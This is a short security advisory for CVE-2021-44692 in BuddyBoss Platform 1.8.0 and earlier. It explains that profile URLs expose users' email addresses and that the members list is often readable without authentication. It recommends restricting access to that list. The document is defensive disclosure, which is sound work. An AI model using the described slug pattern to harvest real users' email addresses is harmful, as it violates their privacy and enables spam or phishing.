CVE-2021-44692

Name of the Vulnerable Software and Affected Versions BuddyBoss Platform versions 1.8.0 and earlier

Description The issue allows remote attackers to obtain the email address of each user. When creating a new user, a Unique ID is generated for their profile, which is their private email address with symbols removed and periods replaced with hyphens. For example, JohnDoe@example.com would become /members/johndoeexample-com and Jo.test@example.com would become /members/jo-testexample-com. The members list is available to everyone and, in a default configuration, often without authentication, making it trivial to collect a list of email addresses.

Recommendations For BuddyBoss Platform versions 1.8.0 and earlier, consider restricting access to the members list to minimize the risk of exploitation, as it is available to everyone and often without authentication in the default configuration. At the moment, there is no information about a newer version that contains a fix for this vulnerability.